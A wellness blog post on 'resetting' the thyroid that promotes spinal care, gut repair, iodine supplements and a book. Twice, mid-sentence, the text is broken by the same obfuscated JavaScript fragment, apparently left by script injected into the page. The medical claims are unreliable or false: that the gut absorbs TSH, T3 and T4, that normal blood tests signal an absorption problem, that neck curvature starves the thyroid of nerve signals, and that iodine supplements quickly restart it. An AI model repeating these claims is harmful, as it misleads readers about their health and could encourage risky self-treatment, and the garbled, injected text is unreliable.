Reset your thyroid

If you are someone who has been slowly gaining weight andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and feeling more lethargic over the years, it's common to suspect that your thyroid is not functioning well.

Here are my top tips for keeping your thyroid working at it's best:

1. Know your spinal curves- Most people don't think about their spine till they have pain, but your spine protects the most important organ in your body-your nervous system. Anything that damages the spine damages your nervous system.

The curve in your neck can easily begin to change for the worse due to repetitive forward head movements like sitting at the computer, tablet, reading or smartphone for long periods of time. When the curve in your neck begins to straighten out, it compresses the nerves going to the thyroid. The more you compress a nerve the less information it can send to andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and from the brain.

A study was done on patients with whiplash. Researchers found that years after a whiplash injury to the neck, a thyroid problem would appear. Why was that? They concluded that extensive damage happened to the lower part of the neck injuring the nerves to the thyroid. Without proper communication from the brain, the thyroid began to breakdown.

2. Repair your gut - When it comes to thyroid function, many people are not thinking of their gut. But the gut is responsible for the absorption of thyroid hormones such as TSH, T3, T4. Your thyroid can be functioning at it's best, but if your gut is out of balance you will not absorb those hormones.

If you are one of those people that suspect your thyroid is malfunctioning, but your blood tests have all turned out normal, you have an absorption problem. It's time to repair your gut. The 45-day reset that I outline in the back half of The Reset Factor, is a great starting point to getting your body able to absorb these hormones again.

3. Supplement with iodine- Our diets are incredibly depleted of minerals. One of those minerals is iodine. Many experts feel that many of us are walking around with an iodine deficiency. The thyroid needs iodine to function properly.

Taking a daily iodine supplement can restart your thyroid quickly. Just make sure the supplement is a food based supplement that doesn't have any fillers or synthetic ingredients, as the thyroid is is very vulnerable to toxins.
